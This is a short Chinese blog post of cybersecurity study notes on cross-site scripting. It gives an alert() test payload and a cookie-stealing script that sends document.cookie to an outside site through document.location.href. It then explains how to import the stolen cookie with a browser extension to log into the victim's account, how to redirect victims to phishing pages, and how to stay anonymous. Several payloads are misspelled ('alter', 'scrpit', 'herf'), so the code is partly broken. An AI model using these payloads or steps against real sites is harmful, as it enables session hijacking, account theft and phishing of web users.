Cyber Security-Day3
XSS攻击
跨站脚本攻击,web应用程序的漏洞
插入JS代码
http://localhost/mst/htmlphp?html=<script>alert("xxx")</script>
基于DOM文档对象模型,可以用js操作DOM中的对象属性,使用document.location,document.url,document.referer等DOM元素的属性
实用场景:比如需要审核留言或者博客的网站,我们可以在输入框 嵌套"><script>alter("xxx")</scrpit>
<script>document.location.href="指定网站,比如https://www.bilibili.com/?cookie="document.cookie"</script>
这样可以跳转到指定网站拿到cookie然后登录
但是现在大厂加了一些
省略号需要处理,或者直接使用cookie editor插件
或者直接操作document.location.herf="xxxxxxxx"钓鱼网站,或者去拿到对方的cookie,使用曲奇插件导入直接操做方法是数据或者账号,这里匿名得做好。
document.URL如果知道对方的身份那么我们可以直接拿他访问的url直接获取对方的后台地址,前提都是找到一个可以XSS脚本注入的地方
本文作者:Arrest
本文链接:https://www.cnblogs.com/arrest/p/16421491.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
标签:
网络安全
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步